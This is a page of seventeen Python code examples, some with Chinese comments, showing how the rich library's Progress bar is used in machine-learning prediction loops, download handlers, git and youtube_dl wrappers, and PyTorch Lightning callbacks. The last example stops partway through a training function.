コード例 #1
0
def predict(trainData, trainLabel, testData, K=27):
    '''
    测试模型正确率
    ===========
    Arguments
    ---------
    - `trainData` 训练集数据集
    - `trainLabel` 训练集标记
    - `testData` 测试集数据集
    - `K` 选择近邻数

    Returns
    -------
    - `predictLabel` 预测标签
    '''
    predictLabel = []

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich 进度条
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for x in testData:
        predictLabel.append(NearestNeighbor(trainData, trainLabel, x,
                                            K))  # 预测标签分类
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
コード例 #2
0
class DefaultProgressHandler(BaseProgressHandler):
    def __init__(self):
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[title]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            DownloadColumn(),
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
        )

    def initialize(self, *args, **kwargs):
        super().initialize(*args)

        self.download_task = self.progress.add_task(self.track_title,
                                                    title=self.track_title,
                                                    total=self.total_size)
        self.progress.start()

    def update(self, *args, **kwargs):
        super().update(**kwargs)
        self.progress.update(self.download_task,
                             advance=self.current_chunk_size)

    def close(self, *args, **kwargs):
        self.progress.stop()
コード例 #3
0
class ProgressBar:
    OPTIONS = [
        "[progress.description]{task.description}",
        BarColumn(),
        "[progress.percentage]{task.completed:>6}/{task.total}",
        TimeElapsedColumn(),
    ]

    def __init__(self, description, total):
        self.description = description
        self.total = total

    def __enter__(self):
        self.progress = Progress(*self.OPTIONS)
        self.progress.start()
        self.task = self.progress.add_task(self.description, total=self.total)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.progress.stop()

    def print(self, message):
        self.progress.console.print(message)

    def advance(self, advance=1):
        self.progress.update(self.task, advance=advance)
コード例 #4
0
ファイル: Downloader.py プロジェクト: ruseecz/pydeezer
    class ProgressHandler(BaseProgressHandler):
        def __init__(self):
            self.tracks = {}
            self.progress = Progress(
                TextColumn("[bold blue]{task.fields[title]}", justify="left"),
                BarColumn(bar_width=None),
                "[progress.percentage]{task.percentage:>3.2f}%",
                "•",
                DownloadColumn(),
                "•",
                TransferSpeedColumn(),
                "•",
                TimeRemainingColumn(),
                transient=True)

        def initialize(self, iterable, track_title, track_quality, total_size,
                       chunk_size, **kwargs):
            track_id = kwargs["track_id"]

            task = self.progress.add_task(track_title,
                                          title=track_title,
                                          total=total_size)

            self.progress.console.print(
                f"[bold red]{track_title}[/] has started downloading.")

            self.tracks[track_id] = {
                "id": track_id,
                "iterable": iterable,
                "title": track_title,
                "quality": track_quality,
                "total_size": total_size,
                "chunk_size": chunk_size,
                "task": task,
                "size_downloaded": 0,
                "current_chunk_size": 0
            }

            self.progress.start()

        def update(self, *args, **kwargs):
            track = self.tracks[kwargs["track_id"]]
            track["current_chunk_size"] = kwargs["current_chunk_size"]
            track["size_downloaded"] += track["current_chunk_size"]

            self.progress.update(track["task"],
                                 advance=track["current_chunk_size"])

        def close(self, *args, **kwargs):
            track = self.tracks[kwargs["track_id"]]
            track_title = track["title"]
            self.progress.print(
                f"[bold red]{track_title}[/] is done downloading.")

        def close_progress(self):
            self.progress.refresh()
            self.progress.stop()
コード例 #5
0
    def format_markdown(path):
        import re
        from rich.progress import Progress
        from .. import user_root
        rt_path = dir_char.join(os.path.abspath(path).split(dir_char)[:-1]) + dir_char
        img_dict = {}
        with open(path, 'r') as fp:
            ct = fp.read()
        aims = re.findall('!\[.*?]\((.*?)\)', ct, re.M) + re.findall('<img.*?src="(.*?)".*?>', ct, re.M)
        progress = Progress(console=qs_default_console)
        pid = progress.add_task('  Upload' if user_lang != 'zh' else '  上传', total=len(aims))
        progress.start()
        progress.start_task(pid)
        for aim in aims:
            if aim.startswith('http'):  # Uploaded
                qs_default_console.print(qs_warning_string, aim,
                                         'is not a local file' if user_lang != 'zh' else '非本地文件')
                progress.advance(pid, 1)
                continue
            raw_path = aim
            aim = aim.replace('~', user_root)
            aim = aim if aim.startswith(dir_char) else get_path(rt_path, aim)
            if aim not in img_dict:
                qs_default_console.print(qs_info_string, 'Start uploading:' if user_lang != 'zh' else '正在上传:', aim)
                res_dict = post_img(aim)
                if not res_dict:
                    res_table.add_row(aim.split(dir_char)[-1], 'No File' if user_lang != 'zh' else '无文件', '')
                    img_dict[aim] = False
                else:
                    try:
                        res_table.add_row(
                            aim.split(dir_char)[-1], str(res_dict['code']),
                            res_dict['msg'] if res_dict['code'] != 200 else (
                                res_dict['data']['url']
                                if res_dict['data']['url'] else plt_type + ' failed')
                        )
                        img_dict[aim] = res_dict['data']['url'] if res_dict['code'] == 200 else False
                    except Exception:
                        qs_default_console.print(qs_error_string, res_dict)
                        res_table.add_row(aim.split(dir_char)[-1], str(res_dict['code']), res_dict['msg'])
                        img_dict[aim] = False

                if img_dict[aim]:
                    qs_default_console.print(qs_info_string, 'replacing img:' if user_lang != 'zh' else '替换路径',
                                             f'"{raw_path}" with "{img_dict[aim]}"')
                    ct = ct.replace(raw_path, img_dict[aim])
            progress.advance(pid, 1)
        progress.stop()
        with open(path, 'w') as fp:
            fp.write(ct)
        qs_default_console.print(res_table, justify="center")
コード例 #6
0
def predict(trainData,
            trainLabel,
            testData,
            kernel='Gaussian',
            C=200,
            epsilon=0.0001,
            sigma=10,
            p=2):
    '''
    测试模型正确率
    ===========
    Arguments
    ---------
    - `trainData` 训练集数据集
    - `trainLabel` 训练集标记
    - `testData` 测试集数据集
    - `kernel` 核函数
    - `C` 软间隔惩罚参数
    - `epsilon` 松弛变量
    - `sigma` 高斯核函数参数
    - `p` 多项式核参数

    Returns
    -------
    - `predictLabel` 预测标签
    '''
    predictLabel = []
    machine = SupportVectorMachine(kernel=kernel,
                                   C=C,
                                   epsilon=epsilon,
                                   sigma=sigma)
    machine.train(trainData, trainLabel)

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich 进度条
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for testDatum in testData:
        predictLabel.append(machine.classify(testDatum))  # 预测标签分类
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
コード例 #7
0
class ProgressBar:
    def __init__(self, total: int) -> None:
        # we will need to inform this processor the total amount of hosts
        # we instantiate a progress bar object
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.completed:>3.0f}/{task.total}",
        )

        # we create four progress bars to track total execution, successes, errors and changes
        self.total = self.progress.add_task("[cyan]Completed...", total=total)
        self.successful = self.progress.add_task("[green]Successful...",
                                                 total=total)
        self.changed = self.progress.add_task("[orange3]Changed...",
                                              total=total)
        self.error = self.progress.add_task("[red]Failed...", total=total)

    def task_started(self, task: Task) -> None:
        # we start the progress bar
        self.progress.start()

    def task_completed(self, task: Task, result: AggregatedResult) -> None:
        # we stop the progress bar
        self.progress.stop()

    def task_instance_started(self, task: Task, host: Host) -> None:
        pass

    def task_instance_completed(self, task: Task, host: Host,
                                results: MultiResult) -> None:
        # we upgrade total execution advancing 1
        self.progress.update(self.total, advance=1)
        if results.failed:
            # if the task failed we increase the progress bar counting errors
            self.progress.update(self.error, advance=1)
        else:
            # if the task succeeded we increase the progress bar counting successes
            self.progress.update(self.successful, advance=1)

        if results.changed:
            # if the task changed the device we increase the progress bar counting changes
            self.progress.update(self.changed, advance=1)

    def subtask_instance_started(self, task: Task, host: Host) -> None:
        pass

    def subtask_instance_completed(self, task: Task, host: Host,
                                   result: MultiResult) -> None:
        pass
コード例 #8
0
class RichLogger(Logger):
    def __init__(self) -> None:
        self.console = autogoal.logging.console()
        self.logger = autogoal.logging.logger()

    def begin(self, generations, pop_size):
        self.progress = Progress(console=self.console)
        self.pop_counter = self.progress.add_task("Generation", total=pop_size)
        self.total_counter = self.progress.add_task("Overall",
                                                    total=pop_size *
                                                    generations)
        self.progress.start()
        self.console.rule("Search starting", style="blue")

    def sample_solution(self, solution):
        self.progress.advance(self.pop_counter)
        self.progress.advance(self.total_counter)
        self.console.rule("Evaluating pipeline")
        self.console.print(repr(solution))

    def eval_solution(self, solution, fitness):
        self.console.print(Panel(f"📈 Fitness=[blue]{fitness:.3f}"))

    def error(self, e: Exception, solution):
        self.console.print(f"⚠️[red bold]Error:[/] {e}")

    def start_generation(self, generations, best_fn):
        self.console.rule(
            f"New generation - Remaining={generations} - Best={best_fn or 0:.3f}"
        )

    def start_generation(self, generations, best_fn):
        self.progress.update(self.pop_counter, completed=0)

    def update_best(self, new_best, new_fn, previous_best, previous_fn):
        self.console.print(
            Panel(
                f"🔥 Best improved from [red bold]{previous_fn or 0:.3f}[/] to [green bold]{new_fn:.3f}[/]"
            ))

    def end(self, best, best_fn):
        self.console.rule(f"Search finished")
        self.console.print(repr(best))
        self.console.print(Panel(f"🌟 Best=[green bold]{best_fn or 0:.3f}"))
        self.progress.stop()
        self.console.rule("Search finished", style="red")
コード例 #9
0
class GitProgress(RemoteProgress):
    def __init__(self):
        super().__init__()
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(None),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[progress.filesize]{task.fields[msg]}",
        )
        self.current_opcode = None
        self.task = None

    def update(self, opcode, count, max_value, msg=None):
        opcode_strs = {
            self.COUNTING: "Counting",
            self.COMPRESSING: "Compressing",
            self.WRITING: "Writing",
            self.RECEIVING: "Receiving",
            self.RESOLVING: "Resolving",
            self.FINDING_SOURCES: "Finding sources",
            self.CHECKING_OUT: "Checking out",
        }
        stage, real_opcode = opcode & self.STAGE_MASK, opcode & self.OP_MASK

        try:
            count = int(count)
            max_value = int(max_value)
        except ValueError:
            return

        if self.current_opcode != real_opcode:
            if self.task:
                self.progress.update(self.task, total=1, completed=1, msg="")
            self.current_opcode = real_opcode
            self.task = self.progress.add_task(
                opcode_strs[real_opcode].ljust(15), msg="")

        if stage & self.BEGIN:
            self.progress.start()
        if stage & self.END:
            self.progress.stop()
        self.progress.update(self.task,
                             msg=msg or "",
                             total=max_value,
                             completed=count)
コード例 #10
0
def predict(trainData,
            trainLabel,
            testData,
            iteration=200,
            learning_rate=0.0001):
    '''
    测试模型正确率
    ===========
    Arguments
    ---------
    - `trainData` 训练集数据集
    - `trainLabel` 训练集标记
    - `testData` 测试集数据集
    - `iteration` 迭代次数
    - `learning_rate` 学习速率

    Returns
    -------
    - `predictLabel` 预测标签
    '''
    predictLabel = []
    classifier = LogisticRegressionClassifier(iteration, learning_rate)
    classifier.train(trainData, trainLabel)

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich 进度条
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for testDatum in testData:
        predictLabel.append(classifier.classify(testDatum))  # 预测标签分类
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
コード例 #11
0
ファイル: rich_progress.py プロジェクト: git2u/httpie
class ProgressDisplay(BaseDisplay):
    def start(self, *, total: Optional[float], at: float,
              description: str) -> None:
        from rich.progress import (
            Progress,
            BarColumn,
            DownloadColumn,
            TimeRemainingColumn,
            TransferSpeedColumn,
        )

        assert total is not None
        self.console.print(f'[progress.description]{description}')
        self.progress_bar = Progress(
            '[',
            BarColumn(),
            ']',
            '[progress.percentage]{task.percentage:>3.0f}%',
            '(',
            DownloadColumn(),
            ')',
            TimeRemainingColumn(),
            TransferSpeedColumn(),
            console=self.console,
            transient=True)
        self.progress_bar.start()
        self.transfer_task = self.progress_bar.add_task(description,
                                                        completed=at,
                                                        total=total)

    def update(self, steps: float) -> None:
        self.progress_bar.advance(self.transfer_task, steps)

    def stop(self, time_spent: Optional[float]) -> None:
        self.progress_bar.stop()

        if time_spent:
            [task] = self.progress_bar.tasks
            self._print_summary(is_finished=task.finished,
                                observed_steps=task.completed,
                                time_spent=time_spent)
コード例 #12
0
    def train(self, trainData, trainLabel):
        '''
        训练
        == =
        Arguments
        ---------
        - `trainData` 训练集数据
        - `trainLabel` 训练集标签

        Returns
        -------
        '''
        self.__x = np.insert(np.array(trainData).astype(float),
                             0,
                             values=1.0,
                             axis=1)  # 训练数据,增加哑变量
        self.__y = np.array(trainLabel)  # 训练样本
        self.__weights = np.zeros(self.__x.shape[1], dtype=float)  # 初始化分类器权重

        progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "•",
            TimeRemainingColumn(),
        )  # rich 进度条
        progress.start()

        trainTask = progress.add_task("[cyan]training...",
                                      total=self.__iteration)

        for iter in range(self.__iteration):
            for i in range(self.__x.shape[0]):
                h = self.__sigmoid(np.dot(self.__x[i], self.__weights))
                self.__weights += self.__alpha * \
                    (self.__y[i] - h) * h * (1 - h) * self.__x[i]  # 更新权重
                progress.update(trainTask, advance=1 / self.__x.shape[0])

        progress.stop()
        return
コード例 #13
0
 def stop(self):
     if self._interactive:
         return Progress.stop(self)
     else:
         with self._lock:
             for tid, task in self._tasks.items():
                 status = ""
                 extra = task.fields.get('status_extra', '')
                 if len(extra) > 0:
                     extra = " (%s)" % extra
                 if task.finished:
                     if task.fields.get('status', 'OK') == 'OK':
                         status = "OK"
                     elif task.fields.get('status', 'OK') == 'WARNING':
                         status = "WARNING"
                     else:
                         status = "ERROR"
                 print("%s [ %s ]%s" % (task.description, status, extra),
                       file=self.console.file)
コード例 #14
0
ファイル: youtube_api.py プロジェクト: kkatayama/plexarr
class YouTubeAPI(object):
    """Wrapper for YouTubeAPI via youtube_dl
    """
    def __init__(self):
        """Constructor3

        From config:
            cookies (str): Path to Cookies File
        """
        config = ConfigParser()
        config.read(
            os.path.join(os.path.expanduser('~'), '.config', 'plexarr.ini'))

        self.path = config['youtube'].get('path')
        self.temp_dir = config['youtube'].get('temp_dir')
        self.cookies = config['youtube'].get('cookies')
        self.progress = Progress()
        self.task = None
        self.downloaded_bytes = 0
        self.download_status = False

    # -- https://stackoverflow.com/a/58667850/3370913
    def my_hook(self, d):
        # print(d)
        if d['status'] == 'finished':
            self.progress.stop()
            file_tuple = os.path.split(os.path.abspath(d['filename']))
            print(f'Done downloading "{file_tuple[1]}"')
        if d['status'] == 'downloading':
            if not self.download_status:
                try:
                    total = int(d["total_bytes"])
                except:
                    total = int(d["total_bytes_estimate"])
                self.download_status = True
                self.task = self.progress.add_task("[cyan]Downloading...",
                                                   total=total)
                self.progress.start()
            step = int(d["downloaded_bytes"]) - int(self.downloaded_bytes)
            self.downloaded_bytes = int(d["downloaded_bytes"])
            self.progress.update(self.task, advance=step)
            # print(d['filename'], d['_percent_str'], d['_eta_str'])

    def downloadEpisode(self,
                        video_url: str,
                        mp4_file: str,
                        format_quality=None,
                        output_template=None,
                        embed_subs=True,
                        add_header=None):
        """Downlod YouTube episode into season path folder

        Args:
            Requires - folder (str) - The video title to store the downloaded video
            Requires - video_url (str) - The link of the YouTube video
        """
        # -- setting up path configs
        self.title = os.path.splitext(os.path.split(mp4_file)[1])[0]
        self.folder = os.path.split(mp4_file)[0]
        self.f_name = mp4_file

        ### Download Movie via YoutubeDL ###
        '''
        'socket_timeout': 15,
        'ratelimit': '50K',
        '''
        ytdl_opts = {
            'writesubtitles':
            True,
            'writeautomaticsub':
            True,
            'cookiefile':
            self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl':
            self.f_name,
            'external_downloader_args': ['-loglevel', 'warning', '-stats'],
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'srt'
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        if format_quality:
            ytdl_opts.update({'format': format_quality})
        if output_template:
            ytdl_opts.update({'outtmpl': output_template})
        if not embed_subs:
            ytdl_opts.pop('postprocessors', None)
        if add_header:
            youtube_dl.utils.std_headers.update(add_header)

        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.download([video_url])
        return ytdl

    def downloadMovie(self, title: str, video_url: str):
        """Downlod YouTube video into folder

        Args:
            Requires - folder (str) - The video title to store the downloaded video
            Requires - video_url (str) - The link of the YouTube video
        """
        # -- setting up path configs
        self.title = title
        self.folder = os.path.join(self.path, title)
        self.f_name = os.path.join(self.path, title, f'{title}.mp4')
        self.video_url_path = os.path.join(self.path, title, 'video_url.txt')

        # -- backup video_url and remove stale directories
        if os.path.exists(self.folder):
            if os.path.exists(self.video_url_path):
                print(
                    f'importing video_url from [magenta]{self.video_url_path}[/magenta]'
                )
                with open(self.video_url_path) as f:
                    video_url = f.readline()
            print(f'deleting existing directory: "{self.folder}"')
            shutil.rmtree(self.folder)

        # -- create fresh directory and backup video_url
        print(f'creating directory: "{self.folder}"')
        print('exporting video_url to [magenta]"video_url.txt"[/magenta]')
        print(f'{{"video_url": {video_url}}}')
        os.mkdir(self.folder)
        with open(self.video_url_path, 'w') as f:
            f.write(f'{video_url}\n')

        ### Download Movie via YoutubeDL ###
        # 'subtitle': '--write-sub --sub-lang en',
        ytdl_opts = {
            'writesubtitles': True,
            'subtitle': '--write-sub --write-auto-sub --embed-subs',
            'cookiefile': self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl': self.f_name,
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }],
            'logger': MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.download([video_url])
        return ytdl

    def getInfo(self,
                video_url: str,
                mp4_file: None,
                format_quality=None,
                output_template=None,
                download=False):
        """Fetch metadata for YouTube video

        Args:
            Requires - video_url (str) - The link of the YouTube video
            Requires - path (str) - The parent directory to store the downloaded video
        Returns:
            JSON Object
        """
        # -- setting up path configs
        self.title = os.path.splitext(os.path.split(mp4_file)[1])[0]
        self.folder = os.path.split(mp4_file)[0]
        self.f_name = mp4_file

        ### Download Movie via YoutubeDL ###
        ytdl_opts = {
            'writesubtitles': True,
            'writeautomaticsub': True,
            'cookiefile': self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl': self.f_name,
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }],
            'logger': MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        if format_quality:
            ytdl_opts.update({'format': format_quality})
        if output_template:
            ytdl_opts.update({'outtmpl': output_template})

        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            metadata = ytdl.extract_info(video_url, download=download)
        return metadata
コード例 #15
0
class RichProgressBar(ProgressBarBase):
    def __init__(self):
        super().__init__()
        self.pg = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.completed}/{task.total}",
            BarDictColumn(),
            transient=True,
            expand=True,
            refresh_per_second=2,
        )
        self._train_id = self._val_id = self._test_id = None

    def disable(self):
        self.pg.disable = True

    def enable(self):
        self.pg.disable = False

    def on_train_start(self, trainer, pl_module):
        super().on_train_start(trainer, pl_module)
        self.pg.start()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        super().on_test_batch_end(trainer, pl_module, outputs, batch,
                                  batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._test_id, completed=self.test_batch_idx, **bardic)
        if self.test_batch_idx >= self.total_test_batches:
            self.pg.stop_task(self._test_id)

    def on_test_epoch_start(self, trainer, pl_module) -> None:
        super().on_test_epoch_start(trainer, pl_module)
        if self._test_id is not None:
            self.pg.remove_task(self._test_id)
        self._test_id = self.pg.add_task("epoch T%03d" % trainer.current_epoch,
                                         total=self.total_test_batches)

    def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                           dataloader_idx):
        super().on_train_batch_end(trainer, pl_module, outputs, batch,
                                   batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._train_id,
                       completed=self.train_batch_idx,
                       **bardic)
        if self.train_batch_idx >= self.total_train_batches:
            self.pg.stop_task(self._train_id)

    def on_train_epoch_start(self, trainer, pl_module):
        super().on_train_epoch_start(trainer, pl_module)
        if self._train_id is not None:
            self.pg.remove_task(self._train_id)
        if self._val_id is not None:
            self.pg.remove_task(self._val_id)
        self._train_id = self.pg.add_task("epoch T%03d" %
                                          trainer.current_epoch,
                                          total=self.total_train_batches)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        super().on_validation_batch_end(trainer, pl_module, outputs, batch,
                                        batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._val_id, completed=self.val_batch_idx, **bardic)
        if self.val_batch_idx >= self.total_val_batches:
            self.pg.stop_task(self._val_id)

    def on_validation_epoch_start(self, trainer, pl_module) -> None:
        super().on_validation_epoch_start(trainer, pl_module)
        self._val_id = self.pg.add_task("epoch V%03d" % trainer.current_epoch,
                                        total=self.total_val_batches)

    def on_train_end(self, trainer, pl_module):
        super().on_train_end(trainer, pl_module)
        self.pg.stop()

    def print(self, *args, **kwargs):
        self.pg.console.print(*args, **kwargs)
コード例 #16
0
ファイル: progress.py プロジェクト: sixtyfive/kraken
class KrakenTrainProgressBar(ProgressBarBase):
    """
    Adaptation of the default ptl rich progress bar to fit with kraken (segtrain, train) output.

    Args:
        refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
            Set it to ``0`` to disable the display.
        leave: Leaves the finished progress bar in the terminal at the end of the epoch. Default: False
        console_kwargs: Args for constructing a `Console`
    """
    def __init__(self,
                 refresh_rate: int = 1,
                 leave: bool = True,
                 console_kwargs: Optional[Dict[str, Any]] = None) -> None:
        super().__init__()
        self._refresh_rate: int = refresh_rate
        self._leave: bool = leave
        self._console_kwargs = console_kwargs or {}
        self._enabled: bool = True
        self.progress: Optional[Progress] = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self._reset_progress_bar_ids()
        self._metric_component = None
        self._progress_stopped: bool = False

    @property
    def refresh_rate(self) -> float:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "Validation Sanity Check"

    @property
    def validation_description(self) -> str:
        return "Validation"

    @property
    def test_description(self) -> str:
        return "Testing"

    def _init_progress(self, trainer):
        if self.is_enabled and (self.progress is None
                                or self._progress_stopped):
            self._reset_progress_bar_ids()
            self._console = Console(**self._console_kwargs)
            self._console.clear_live()
            columns = self.configure_columns(trainer)
            self._metric_component = MetricsTextColumn(trainer)
            columns.append(self._metric_component)

            if trainer.early_stopping_callback:
                self._early_stopping_component = EarlyStoppingColumn(trainer)
                columns.append(self._early_stopping_component)

            self.progress = Progress(*columns,
                                     auto_refresh=False,
                                     disable=self.is_disabled,
                                     console=self._console)
            self.progress.start()
            # progress has started
            self._progress_stopped = False

    def refresh(self) -> None:
        if self.progress:
            self.progress.refresh()

    def on_train_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_test_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_validation_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_end(self, trainer, pl_module):
        if self.progress is not None:
            self.progress.update(self.val_sanity_progress_bar_id,
                                 advance=0,
                                 visible=False)
        self.refresh()

    def on_train_epoch_start(self, trainer, pl_module):
        total_train_batches = self.total_train_batches
        total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            total_val_batches = total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + total_val_batches

        train_description = f"stage {trainer.current_epoch}/{trainer.max_epochs if pl_module.hparams.quit == 'dumb' else '∞'}"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due of uneven lengths of "Epoch X"
            # and "Validation" Bar description
            num_digits = len(str(trainer.current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "

        if self.main_progress_bar_id is not None and self._leave:
            self._stop_progress()
            self._init_progress(trainer)
        if self.main_progress_bar_id is None:
            self.main_progress_bar_id = self._add_task(total_batches,
                                                       train_description)
        elif self.progress is not None:
            self.progress.reset(self.main_progress_bar_id,
                                total=total_batches,
                                description=train_description,
                                visible=True)
        self.refresh()

    def on_validation_epoch_start(self, trainer, pl_module):
        if trainer.sanity_checking:
            self.val_sanity_progress_bar_id = self._add_task(
                self.total_val_batches, self.sanity_check_description)
        else:
            self.val_progress_bar_id = self._add_task(
                self.total_val_batches,
                self.validation_description,
                visible=False)
        self.refresh()

    def _add_task(self,
                  total_batches: int,
                  description: str,
                  visible: bool = True) -> Optional[int]:
        if self.progress is not None:
            return self.progress.add_task(f"{description}",
                                          total=total_batches,
                                          visible=visible)

    def _update(self,
                progress_bar_id: int,
                current: int,
                total: Union[int, float],
                visible: bool = True) -> None:
        if self.progress is not None and self._should_update(current, total):
            leftover = current % self.refresh_rate
            advance = leftover if (current == total
                                   and leftover != 0) else self.refresh_rate
            self.progress.update(progress_bar_id,
                                 advance=advance,
                                 visible=visible)
            self.refresh()

    def _should_update(self, current: int, total: Union[int, float]) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def on_validation_epoch_end(self, trainer, pl_module):
        if self.val_progress_bar_id is not None and trainer.state.fn == "fit":
            self.progress.update(self.val_progress_bar_id,
                                 advance=0,
                                 visible=False)
            self.refresh()

    def on_validation_end(self, trainer: "pl.Trainer",
                          pl_module: "pl.LightningModule") -> None:
        if trainer.state.fn == "fit":
            self._update_metrics(trainer, pl_module)

    def on_test_epoch_start(self, trainer, pl_module):
        self.test_progress_bar_id = self._add_task(self.total_test_batches,
                                                   self.test_description)
        self.refresh()

    def on_train_batch_end(self, trainer, pl_module, outputs, batch,
                           batch_idx):
        self._update(self.main_progress_bar_id, self.train_batch_idx,
                     self.total_train_batches)
        self._update_metrics(trainer, pl_module)
        self.refresh()

    def on_train_epoch_end(self, trainer: "pl.Trainer",
                           pl_module: "pl.LightningModule") -> None:
        self._update_metrics(trainer, pl_module)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        if trainer.sanity_checking:
            self._update(self.val_sanity_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        elif self.val_progress_bar_id is not None:
            # check to see if we should update the main training progress bar
            if self.main_progress_bar_id is not None:
                self._update(self.main_progress_bar_id, self.val_batch_idx,
                             self.total_val_batches)
            self._update(self.val_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        self.refresh()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        self._update(self.test_progress_bar_id, self.test_batch_idx,
                     self.total_test_batches)
        self.refresh()

    def _stop_progress(self) -> None:
        if self.progress is not None:
            self.progress.stop()
            # # signals for progress to be re-initialized for next stages
            self._progress_stopped = True

    def _reset_progress_bar_ids(self):
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None

    def _update_metrics(self, trainer, pl_module) -> None:
        metrics = self.get_metrics(trainer, pl_module)
        metrics.pop('loss', None)
        metrics.pop('val_metric', None)
        if self._metric_component:
            self._metric_component.update(metrics)

    def teardown(self,
                 trainer,
                 pl_module,
                 stage: Optional[str] = None) -> None:
        self._stop_progress()

    def on_exception(self, trainer, pl_module,
                     exception: BaseException) -> None:
        self._stop_progress()

    @property
    def val_progress_bar(self) -> Task:
        return self.progress.tasks[self.val_progress_bar_id]

    @property
    def val_sanity_check_bar(self) -> Task:
        return self.progress.tasks[self.val_sanity_progress_bar_id]

    @property
    def main_progress_bar(self) -> Task:
        return self.progress.tasks[self.main_progress_bar_id]

    @property
    def test_progress_bar(self) -> Task:
        return self.progress.tasks[self.test_progress_bar_id]

    def configure_columns(self, trainer) -> list:
        return [
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            TimeRemainingColumn(),
            TimeElapsedColumn()
        ]
コード例 #17
0
def fit(epochs: int,
        lr: float,
        model: nn.Module,
        loss_fn,
        opt,
        train_dl,
        val_dl,
        debug_run: bool = False,
        debug_num_batches: int = 5):
    model.to(device)
    opt = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9)
    # mb = master_bar(range(epochs))
    progress_bar = Progress()

    # mb.write(['epoch', 'train_loss', 'val loss', 'time', 'train time', 'val_time'], table=True)
    progress_bar.start()
    header = [
        'epoch', 'train_loss', 'val loss', 'time', 'train time', 'val_time'
    ]  # , 'val_time', 'train_time']
    progress_bar.print(' '.join([f"{value:>9}" for value in header]))
    main_job = progress_bar.add_task('fit...', total=epochs)
    # for epoch in mb:
    for epoch in range(epochs):
        progress_bar.tasks[
            main_job].description = f"ep {epoch + 1} of {epochs}"
        # mb.main_bar.comment = f"ep {epoch + 1} of {epochs}"

        model.train()
        start_time = time.time()
        # for batch_num, batch in enumerate(progress_bar(train_dl, parent=mb)):
        len_train_dl = len(train_dl)
